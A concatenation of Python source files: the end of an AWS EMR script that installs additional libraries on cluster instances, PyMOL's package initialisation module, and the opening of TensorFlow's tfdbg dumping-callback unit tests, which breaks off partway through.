params = '--os_user {} --instance_ip {} --keyfile "{}" --libs "{}"'\
.format(data_engine['os_user'], data_engine['instance_ip'],
data_engine['keyfile'], data_engine['libs'])
try:
# Run script to install additional libs
local("~/scripts/{}.py {}".format('install_additional_libs', params))
except:
traceback.print_exc()
raise Exception
if __name__ == "__main__":
create_aws_config_files()
instance_class = 'notebook'
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.DEBUG,
filename=local_log_filepath)
try:
logging.info('[INSTALLING ADDITIONAL LIBRARIES ON DATAENGINE-SERVICE]')
print('[INSTALLING ADDITIONAL LIBRARIES ON DATAENGINE-SERVICE]')
data_engine = dict()
try:
data_engine['os_user'] = 'ec2-user'
data_engine['cluster_name'] = os.environ['computational_id']
data_engine['cluster_id'] = get_emr_id_by_name(data_engine['cluster_name'])
data_engine['cluster_instances'] = get_emr_instances_list(data_engine['cluster_id'])
data_engine['keyfile'] = '{}{}.pem'.format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
data_engine['libs'] = os.environ['libs']
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to get parameter.", str(err))
sys.exit(1)
try:
jobs = []
for instance in data_engine['cluster_instances']:
p = multiprocessing.Process(target=install_libs, args=(instance, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to install additional libraries.", str(err))
sys.exit(1)
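# Illustration of the command assembled per instance in install_libs()
# (all values hypothetical):
#   ~/scripts/install_additional_libs.py \
#       --os_user ec2-user --instance_ip 10.0.1.15 \
#       --keyfile "/root/keys/dlab-key.pem" --libs "numpy,scipy"
# One such process is spawned per EMR cluster instance via multiprocessing.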
|
__init__.py
|
'''
PyMOL Molecular Graphics System
Copyright (c) Schrodinger, Inc.
Supported ways to launch PyMOL:
If $PYMOL_PATH is a non-default location, it must be set and exported
before launching PyMOL.
From a terminal:
shell> python /path/to/pymol/__init__.py [args]
If the 'pymol' module is in PYTHONPATH
shell> python -m pymol [args]
From a python main thread:
>>> # blocks the interpreter
>>> import pymol
>>> pymol.launch()
From a python main thread, spawning a new thread:
>>> # with GUI
>>> # THIS IS NOT SUPPORTED ON macOS
>>> import pymol
>>> pymol.finish_launching()
>>> # without GUI
>>> import pymol
>>> pymol.finish_launching(['pymol', '-cq'])
'''
import os
import sys
import __main__
if __name__ == '__main__':
# PyMOL launched as "python pymol/__init__.py"
# or via execfile(".../pymol/__init__.py",...) from main
# or as "python -m pymol.__init__"
if 'pymol' not in sys.modules:
# "python /abc/pymol/__init__.py" will add /abc/pymol to PYTHONPATH
# (we don't want that), but not /abc and not the current directory (we
# want those)
pymol_base = os.path.dirname(os.path.realpath(__file__))
site_packages = os.path.dirname(pymol_base)
# remove /abc/pymol
if pymol_base in sys.path:
sys.path.remove(pymol_base)
# add /abc
if site_packages not in sys.path:
sys.path.insert(0, site_packages)
# add current directory
if '' not in sys.path:
sys.path.insert(0, '')
# arguments default to sys.argv... but also support execfile(...)
# from a terminal where the user could set pymol_argv
args = getattr(__main__, "pymol_argv", None)
# standard launch (consume main thread)
import pymol
sys.exit(pymol.launch(args))
IS_WINDOWS = sys.platform.startswith('win')
IS_MACOS = sys.platform.startswith('darwin')
IS_LINUX = sys.platform.startswith('linux')
import _thread as thread
import copy
import threading
import re
import time
import traceback
import math
from . import invocation
from . import colorprinting
def _init_internals(_pymol):
# Create a temporary object "stored" in the PyMOL global namespace
# for usage with evaluate based-commands such as alter
_pymol.stored = Scratch_Storage()
# Create a permanent object in the PyMOL global namespace
# that will be picked and unpickled along with the session
_pymol.session = Session_Storage()
# This global will be non-None if logging is active
# (global variable used for efficiency)
_pymol._log_file = None
# This global will be non-None if an external gui
# exists. It mainly exists so that events which occur
# in the Python thread can be handed off to the
# external GUI thread through one or more FIFO Queues
# (global variable used for efficiency)
_pymol._ext_gui = None
# lists of functions to call when saving and restoring pymol session objects
_pymol._session_save_tasks = []
_pymol._session_restore_tasks = []
# cached results (as a list):
# [ [size, (hash1, hash2, ... ), (inp1, inp2, ...), output],
# [size, (hash1, hash2, ... ), (inp1, inp2, ...), output],
# ... ]
_pymol._cache = []
# standard input reading thread
_pymol._stdin_reader_thread = None
# stored views
_pymol._view_dict = {}
_pymol._view_dict_sc = None
# stored scenes
_pymol._scene_quit_on_action = ''
# get us a private invocation pseudo-module
_pymol._invocation = Scratch_Storage()
_pymol._invocation.options = copy.deepcopy(invocation.options)
_pymol._invocation.get_user_config = invocation.get_user_config
_pymol._invocation.parse_args = invocation.parse_args
# these locks are to be shared by all PyMOL instances within a
# single Python interpreter
_pymol.lock_api = threading.RLock() # mutex for API calls from the outside
_pymol.lock_api_status = threading.RLock() # mutex for PyMOL status info
_pymol.lock_api_glut = threading.RLock() # mutex for GLUT avoidance
_pymol.lock_api_data = threading.RLock() # mutex for internal data structures
def get_version_message(v=None):
'''
Get an informative product + version string
'''
if not v:
v = _cmd.get_version()
p = "PyMOL %s " % v[0]
p += "Incentive Product" if invocation.options.incentive_product else \
"Open-Source"
if v[4]:
p += ' (' + v[4][:10] + ')'
if v[3]:
p += ', ' + time.strftime('%Y-%m-%d', time.localtime(v[3]))
return p
def guess_pymol_path():
'''
Guess PYMOL_PATH from typical locations and return it as string.
'''
init_file = os.path.abspath(__file__)
pymol_path_candidates = [
# $PYMOL_PATH == <site-packages>/pymol/pymol_path
os.path.join(os.path.dirname(init_file), 'pymol_path'),
# $PYMOL_PATH/modules/pymol/__init__.py
re.sub(r"[\/\\]modules[\/\\]pymol[\/\\]__init__\.py[c]*$", "", init_file),
# /usr/share/pymol
os.path.join(sys.prefix, 'share', 'pymol'),
# venv --system-site-packages (experimental)
os.path.join(sys.base_prefix, 'share', 'pymol'),
]
for pymol_path in pymol_path_candidates:
if os.path.isdir(pymol_path):
return pymol_path
return '.'
def setup_environ():
# guess PYMOL_PATH if unset
if 'PYMOL_PATH' not in os.environ:
os.environ['PYMOL_PATH'] = guess_pymol_path()
# other PyMOL variables
if 'PYMOL_DATA' not in os.environ:
os.environ['PYMOL_DATA'] = os.path.join(os.environ['PYMOL_PATH'], 'data')
if 'PYMOL_SCRIPTS' not in os.environ:
os.environ['PYMOL_SCRIPTS'] = os.path.join(os.environ['PYMOL_PATH'], 'scripts')
os.environ['TUT'] = os.path.join(os.environ['PYMOL_DATA'], 'tut')
# set Tcl/Tk environment if we ship it in ext/lib
pymol_path = os.environ['PYMOL_PATH']
for varname, dirname in [
('TCL_LIBRARY', 'tcl8.5'),
('TK_LIBRARY', 'tk8.5')]:
dirname = os.path.join(pymol_path, "ext", "lib", dirname)
if os.path.isdir(dirname):
os.environ[varname] = dirname
def exec_str(self, string):
'''
Execute string in "self" namespace (used from C)
'''
try:
exec(string, self.__dict__, self.__dict__)
except Exception:
traceback.print_exc()
return None
def exec_deferred(self):
'''
Execute the stuff from invocations.options.deferred
'''
try:
from socket import error as socket_error
except ImportError:
socket_error = None
print('import socket failed')
cmd = self.cmd
_pymol = cmd._pymol
# read from stdin (-p)
if self.invocation.options.read_stdin and not _pymol._stdin_reader_thread:
try:
t = _pymol._stdin_reader_thread = \
threading.Thread(target=cmd._parser.stdin_reader)
t.setDaemon(1)
t.start()
except:
traceback.print_exc()
# do the deferred stuff
try:
if cmd.ready():
cmd.config_mouse(quiet=1)
for a in self.invocation.options.deferred:
if a[0:4] == "_do_":
cmd.do(a[4:])
else:
cmd.load(a, quiet=0)
except CmdException as e:
colorprinting.error(str(e))
colorprinting.error(
" Error: Argument processing aborted due to exception (above).")
except socket_error:
# this (should) only happen if we're opening a PWG file on startup
# and the port is busy. For now, simply bail...
cmd.wizard("message",["Socket.error: ","",
"\\999Assigned socket in use.","",
"\\779Is PyMOL already launched?","",
"\\966Shutting down..."])
cmd.refresh()
cmd.do("time.sleep(2);cmd.quit()")
def adapt_to_hardware(self):
'''
optimize for (or workaround) specific hardware
'''
cmd = self.cmd
vendor, renderer, version = cmd.get_renderer()
# Quadro cards don't support GL_BACK in stereo contexts
if vendor.startswith('NVIDIA'):
if 'Quadro' in renderer:
if invocation.options.show_splash:
print(" Adapting to Quadro hardware.")
cmd.set('stereo_double_pump_mono', 1)
elif vendor.startswith('Mesa'):
if renderer[0:18]=='Mesa GLX Indirect':
pass
elif vendor.startswith('ATI'):
if renderer[0:17] == 'FireGL2 / FireGL3': # obsolete ?
if invocation.options.show_splash:
print(" Adapting to FireGL hardware.")
cmd.set('line_width', 2, quiet=1)
if IS_WINDOWS:
if sys.getwindowsversion()[0] > 5:
# prevent color corruption by calling glFlush etc.
cmd.set('ati_bugs', 1)
if 'Radeon HD' in renderer:
if invocation.options.show_splash:
print(" Adjusting settings to improve performance for ATI cards.")
if cmd.get_setting_int("use_shaders")==0:
# limit frame rate to 30 fps to avoid ATI "jello"
# where screen updates fall way behind the user.
cmd.set("max_ups", 30)
elif vendor.startswith('Microsoft'):
if renderer[0:17] == 'GDI Generic':
cmd.set('light_count', 1)
cmd.set('spec_direct', 0.7)
elif vendor.startswith("Intel"):
if "Express" in renderer:
if invocation.options.show_splash:
print(" Disabling shaders for Intel Express graphics")
cmd.set("use_shaders", 0)
elif (' R300 ' in vendor # V: X.Org R300 Project, R: Gallium 0.4 on ATI RV370
):
if invocation.options.show_splash:
print(" Detected blacklisted graphics driver. Disabling shaders.")
cmd.set("use_shaders", 0)
# find out how many processors we have, and adjust hash
# table size to reflect available RAM
try:
import multiprocessing
ncpu = multiprocessing.cpu_count()
if ncpu > 1:
cmd.set("max_threads", ncpu)
if invocation.options.show_splash:
print(" Detected %d CPU cores."%ncpu, end=' ')
print(" Enabled multithreaded rendering.")
except:
pass
# store our adapted state as default
cmd.reinitialize("store")
def launch_gui(self):
'''
Launch if requested:
- external GUI
'''
pymol_path = os.getenv('PYMOL_PATH', '')
try:
poll = IS_MACOS
if self.invocation.options.external_gui == 3:
if 'DISPLAY' not in os.environ:
os.environ['DISPLAY'] = ':0.0'
if self.invocation.options.external_gui in (1, 3):
__import__(self.invocation.options.gui)
sys.modules[self.invocation.options.gui].__init__(self, poll,
skin = self.invocation.options.skin)
# import plugin system
import pymol.plugins
except:
traceback.print_exc()
def prime_pymol():
'''
Set the current thread as the glutThread
'''
global glutThread
if not glutThread:
glutThread = thread.get_ident()
def _launch_no_gui():
import pymol2
p = pymol2.SingletonPyMOL()
p.start()
# TODO sufficient?
while (p.idle() or p.getRedisplay() or
invocation.options.keep_thread_alive or
cmd.get_modal_draw() or
cmd.get_setting_int('keep_alive') or
cmd._pymol._stdin_reader_thread is not None):
p.draw()
# TODO needed?
cmd.sync()
p.stop()
def launch(args=None, block_input_hook=0):
'''
Run PyMOL with args
Only returns if we are running pretend GLUT.
'''
if args is None:
args = sys.argv
invocation.parse_args(args)
if invocation.options.gui == 'pmg_qt':
if invocation.options.no_gui:
return _launch_no_gui()
elif invocation.options.testing:
return pymol._cmd.test2()
try:
from pmg_qt import pymol_qt_gui
return pymol_qt_gui.execapp()
except ImportError as ex:
print(f'Qt not available ({ex}), using GLUT/Tk interface')
invocation.options.gui = 'pmg_tk'
prime_pymol()
_cmd.runpymol(None, block_input_hook)
def finish_launching(args=None):
'''
Start the PyMOL process in a thread
THIS IS NOT SUPPORTED ON macOS
'''
global glutThreadObject
if cmd._COb is not None:
return
import pymol
# legacy
if args is None:
args = getattr(pymol, 'pymol_argv', None)
if args is None:
args = getattr(__main__, 'pymol_argv', sys.argv)
if True:
# run PyMOL in thread
invocation.options.keep_thread_alive = 1
cmd.reaper = threading.current_thread()
glutThreadObject = threading.Thread(target=launch,
args=(list(args), 1))
glutThreadObject.start()
e = threading.Event()
# wait for the C library to initialize
while cmd._COb is None:
e.wait(0.01)
# make sure symmetry module has time to start...
while not hasattr(pymol, 'xray'):
e.wait(0.01)
class CmdException(Exception):
'''
Exception type for PyMOL commands
'''
label = "Error"
def __init__(self, message='', label=None):
self.message = message
if message:
self.args = (message,)
if label:
self.label = label
def __str__(self):
return " %s: %s" % (self.label, self.message)
class IncentiveOnlyException(CmdException):
'''
Exception type for features that are not available in Open-Source PyMOL
'''
label = "Incentive-Only-Error"
def __init__(self, message=''):
if not message:
try:
funcname = sys._getframe(1).f_code.co_name
message = '"%s" is not available in Open-Source PyMOL' % (funcname,)
except:
message = 'Not available in Open-Source PyMOL'
message += '\n\n' \
' Please visit http://pymol.org if you are interested in the\n' \
' full featured "Incentive PyMOL" version.\n'
super(IncentiveOnlyException, self).__init__(message)
class Scratch_Storage:
'''
Generic namespace
'''
def __reduce__(self):
# for loading Python 3 (new-style class) pickle with Python 2
return (self.__class__, (), self.__dict__)
def get_unused_name(self, prefix='tmp'):
'''
Get an unused name from this namespace
'''
i = 1
while True:
name = prefix + str(i)
if not hasattr(self, name):
setattr(self, name, None)
return name
i += 1
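# Example behaviour of get_unused_name() (illustrative):
#   stored = Scratch_Storage()
#   stored.get_unused_name('tmp')   # -> 'tmp1' (and sets stored.tmp1 = None)
#   stored.get_unused_name('tmp')   # -> 'tmp2'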
class Session_Storage:
'''
Generic namespace
'''
def __reduce__(self):
# for loading Python 3 (new-style class) pickle with Python 2
return (self.__class__, (), self.__dict__)
def _colortype(cmd):
# backwards compatible color index type for iterate, which used
# to expose colors as RGB tuples
get_color_tuple = cmd.get_color_tuple
class Color(int):
def __getitem__(self, i):
return get_color_tuple(self)[i]
def __len__(self):
return 3
return Color
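# Example of the backwards-compatible color type built above (sketch; `idx`
# stands for any valid PyMOL color index):
#   Color = _colortype(cmd)
#   c = Color(idx)
#   int(c)    # still the plain color index
#   c[0]      # red component, via cmd.get_color_tuple(idx)[0]
#   len(c)    # 3, so iterate-scripts expecting an RGB tuple keep working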
######### VARIABLES ############################
glutThread = None
######### ENVIRONMENT ##########################
setup_environ()
# initialize instance-specific module/object internals
_init_internals(sys.modules[__name__])
# get X-window support (machine_get_clipboard)
if 'DISPLAY' in os.environ:
from .xwin import *
########## C MODULE ############################
import pymol._cmd
_cmd = sys.modules['pymol._cmd']
get_capabilities = _cmd.get_capabilities
from . import cmd
cmd._COb = None
try:
import epymol
except ImportError:
pass
########## WORKAROUND TO PREVENT "import cmd" ##############################
# Previous versions of PyMOL did relative imports and thus allowed
# "import cmd" in pymol scripts to import the pymol.cmd module. To be more
# strict and for compatibility with python3 we use absolute imports now,
# which unfortunately will import an unrelated "cmd" module from the default
# python library, and even worse will corrupt the pymol namespace with it.
# The following causes an import error for "import cmd":
class _NoCmdFinder:
def find_spec(self, fullname, path=None, target=None):
if path is None and fullname == 'cmd':
msg = 'use "from pymol import cmd" instead of "import cmd"'
print('Warning: {}'.format(msg))
return None
find_module = find_spec
sys.meta_path.insert(0, _NoCmdFinder())
########## LEGACY PRINT STATEMENT FOR PYMOL COMMAND LINE ###################
if True:
def _print_statement(*args, **_):
'''Legacy Python-2-like print statement for the PyMOL command line'''
kw = {}
if args and args[0].startswith('>>'):
kw['file'] = eval(args[0][2:])
args = args[1:]
if args and not args[-1]:
kw['end'] = ' '
args = args[:-1]
args = [eval(a) for a in args]
print(*args, **kw)
cmd.extend('print', _print_statement)
|
dumping_callback_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Unit tests for tfdbg v2 dumping callback."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import shutil
import tempfile
import threading
from absl.testing import parameterized
import numpy as np
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import dumping_callback
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.keras import models
from tensorflow.python.keras.applications import mobilenet_v2
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.layers import recurrent_v2
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
def _create_simple_recurrent_keras_model(input_shape):
"""Create a simple tf.keras model containing a recurrent layer for testing."""
model = models.Sequential()
model.add(recurrent_v2.LSTM(
10,
input_shape=input_shape,
kernel_initializer="zeros",
recurrent_initializer="zeros"))
model.add(core.Dense(1, kernel_initializer="zeros"))
model.compile(loss="mse", optimizer="sgd")
return model
class TracingCallbackTest(
dumping_callback_test_lib.DumpingCallbackTestBase, parameterized.TestCase):
def setUp(self):
super(TracingCallbackTest, self).setUp()
self.dump_root = tempfile.mkdtemp()
def tearDown(self):
if os.path.isdir(self.dump_root):
shutil.rmtree(self.dump_root, ignore_errors=True)
dumping_callback.disable_dump_debug_info()
super(TracingCallbackTest, self).tearDown()
def testInvalidTensorDebugModeCausesError(self):
with self.assertRaisesRegexp(
ValueError,
r"Invalid value in tensor_debug_mode \(\'NONSENSICAL\'\).*"
r"Valid options.*NO_TENSOR.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NONSENSICAL")
def testDisablingTracingCallbackWithoutEnablingFirstIsTolerated(self):
dumping_callback.disable_dump_debug_info()
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
def testPureEagerOpExecution(self, tensor_debug_mode):
"""Test dumping data from eager op execution: float32."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = constant_op.constant(10.0)
zero = constant_op.constant(0.0)
one = constant_op.constant(1.0)
two = constant_op.constant(2.0)
three = constant_op.constant(3.0)
# Use Collatz conjecture as a test case.
while x > one:
if math_ops.equal(x % two, zero):
x = x / two
else:
x = x * three + one
writer.FlushNonExecutionFiles()
self._readAndCheckMetadataFile()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
# Before FlushExecutionFiles() is called, the .execution file should be
# empty.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
execution_iter = reader.execution_iterator()
with self.assertRaises(StopIteration):
next(execution_iter)
# After the flushing, the .execution file should hold the appropriate
# contents.
writer.FlushExecutionFiles()
execution_iter = reader.execution_iterator()
prev_wall_time = 1
executed_op_types = []
tensor_values = collections.defaultdict(lambda: [])
for debug_event in execution_iter:
self.assertGreaterEqual(debug_event.wall_time, prev_wall_time)
prev_wall_time = debug_event.wall_time
execution = debug_event.execution
executed_op_types.append(execution.op_type)
# No graph IDs should have been logged for eager op executions.
self.assertFalse(execution.graph_id)
self.assertTrue(execution.input_tensor_ids)
self.assertTrue(execution.output_tensor_ids)
if tensor_debug_mode == "NO_TENSOR":
# Due to the NO_TENSOR tensor debug mode, tensor_protos ought to
# be empty.
self.assertFalse(execution.tensor_protos)
elif tensor_debug_mode == "CURT_HEALTH":
self.assertLen(execution.tensor_protos, 1)
if execution.op_type in ("AddV2", "Mul", "RealDiv"):
# 1st element: -1 is the unset tensor_id for eager op execution.
# 2nd element: 0 means there is no inf or nan.
self.assertAllClose(
tensor_util.MakeNdarray(execution.tensor_protos[0]),
[-1.0, 0.0])
elif tensor_debug_mode == "FULL_TENSOR":
# Under the FULL_TENSOR mode, the value of the tensor should be
# available through `tensor_protos`.
tensor_value = float(
tensor_util.MakeNdarray(execution.tensor_protos[0]))
tensor_values[execution.op_type].append(tensor_value)
# Verify the code_location field.
self.assertTrue(execution.code_location.stack_frame_ids)
for stack_frame_id in execution.code_location.stack_frame_ids:
self.assertIn(stack_frame_id, stack_frame_by_id)
if tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values["Greater"], [1, 1, 1, 1, 1, 1, 0])
self.assertAllClose(tensor_values["RealDiv"], [5, 8, 4, 2, 1])
self.assertAllClose(tensor_values["Mul"], [15])
self.assertAllClose(tensor_values["AddV2"], [16])
self.assertEqual(
executed_op_types,
[
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 10 --> 5
"Greater",
"FloorMod",
"Equal",
"Mul",
"AddV2", # 5 --> 16
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 16 --> 8
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 8 --> 4
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 4 --> 2
"Greater",
"FloorMod",
"Equal",
"RealDiv", # 2 --> 1
"Greater"
])
# Due to the pure eager op execution, the .graph file and the
# .graph_execution_traces file ought to be empty.
graphs_iterator = reader.graphs_iterator()
with self.assertRaises(StopIteration):
next(graphs_iterator)
graph_trace_iter = reader.graph_execution_traces_iterator()
with self.assertRaises(StopIteration):
next(graph_trace_iter)
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testNestedFunctionExecutionWithoutControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(sin1p_log_sum(x, y), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, so doesn't get logged to the
# .execution file.
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
executed_op_types = [op_type for op_type in executed_op_types
if "sin1p_log_sum" in op_type]
self.assertLen(executed_op_types, 1)
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types, op_name_to_op_type,
op_name_to_context_id) = self._readAndCheckGraphsFile(stack_frame_by_id)
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
if context.executing_eagerly():
# Check the correctness of the ID of the executed graph ID.
sin_op_name = [op_name for op_name in op_name_to_op_type
if op_name_to_op_type[op_name] == "Sin"]
self.assertLen(sin_op_name, 1)
sin_context_id = op_name_to_context_id[sin_op_name[0]]
# The executed "op" is a FuncGraph, and its graph ID should have been
# recorded properly and be the ID of the graph that the Sin op belongs to.
executed_graph_ids = [
executed_graph_ids[i] for i, op_type
in enumerate(executed_op_types) if "sin1p_log_sum" in op_type]
self.assertEqual(executed_graph_ids[0], sin_context_id)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2", "Sin"])
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought to
# be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertEqual(tensor_value.dtype, np.float32)
self.assertEqual(tensor_value.shape, (0,))
elif tensor_debug_mode == "CURT_HEALTH":
for tensor_value in tensor_values:
self.assertLen(tensor_value, 2)
# 1st element: tensor_id, should be >= 0.
# TODO(cais): Assert on detailed value once Function-graph association
# is in place.
self.assertGreaterEqual(tensor_value[0], 0)
# 2nd element: 0 means there is no inf or nan.
self.assertEqual(tensor_value[1], 0)
elif tensor_debug_mode == "FULL_TENSOR":
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
self.assertAllClose(tensor_values[3],
np.sin(np.log(5.0) + 1.0)) # Sin op.
def testCapturingExecutedGraphIdsOfTwoCompilationsOfSameFunction(self):
"""Test correct executed IDs of two FuncGraphs from the same Py function."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def ceil_times_two(x):
return math_ops.ceil(x) * 2.0
x_float32 = np.array(3.5, dtype=np.float32)
x_float64 = np.array(4.5, dtype=np.float64)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
self.assertLen(executed_op_types, 4)
for executed_op_type in executed_op_types:
self.assertStartsWith(executed_op_type, "__inference_ceil_times_two_")
self.assertLen(executed_graph_ids, 4)
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertLen(set(executed_graph_ids), 2)
def testCapturingExecutedGraphIdsOfDuplicateFunctionNames(self):
"""Two FuncGraphs compiled from Python functions with identical names."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
class TestClass(object):
@def_function.function
def ceil_times_two(self, x):
return math_ops.ceil(x) * 2.0
# The `ceil_times_two` method of the two objects will be compiled
# into separate FuncGraphs.
test_object_1 = TestClass()
test_object_2 = TestClass()
x = np.array(3.5, dtype=np.float32)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
(executed_op_types, executed_graph_ids,
_, _, _, _) = self._readAndCheckExecutionFile()
self.assertLen(executed_op_types, 4)
for executed_op_type in executed_op_types:
self.assertStartsWith(executed_op_type, "__inference_ceil_times_two_")
self.assertLen(executed_graph_ids, 4)
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertLen(set(executed_graph_ids), 2)
@parameterized.named_parameters(
("AddV2", "AddV2"),
("Log", "Log"),
("AddV2AndLog", "(AddV2|Log)"),
)
@test_util.run_in_graph_and_eager_modes
def testOpRegex(self, op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
op_regex=op_regex)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(
self.evaluate(sin1p_log_sum(x, y)), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
stack_frame_by_id = self._readAndCheckSourceFilesAndStackFrames()
(context_ids, op_types,
op_name_to_op_type, _) = self._readAndCheckGraphsFile(stack_frame_by_id)
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
(op_names, _, _,
tensor_values) = self._readAndCheckGraphExecutionTracesFile(context_ids)
executed_op_types = [op_name_to_op_type[op_name] for op_name in op_names]
if op_regex == "AddV2":
self.assertEqual(executed_op_types, ["AddV2", "AddV2"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0) + 1.0) # 2nd AddV2 op.
elif op_regex == "Log":
self.assertEqual(executed_op_types, ["Log"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], np.log(5.0)) # Log op.
else: # "(AddV2|Log)"
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
def testIncorrectTensorDTypeArgFormatLeadsToError(self):
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*\{\}"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes=dict())
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes="float32")
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_dtypes=dtypes.float32)
with self.assertRaises(TypeError):
dumping_callback.enable_dump_debug_info(self.dump_root, tensor_dtypes=[
lambda dtype: dtype.is_floating, lambda dtype: dtype.is_integer])
@parameterized.named_parameters(
("float", [dtypes.float32], None),
("float_only_sum", ["float32"], "Sum"),
("float_no_sum", (dtypes.float32,), "(?!Sum)"),
("int", [dtypes.int32], None),
("int_via_lambda", lambda dtype: dtype.is_integer, None),
("exclude_Sum", None, "(?!Sum)"),
("All", None, None),
)
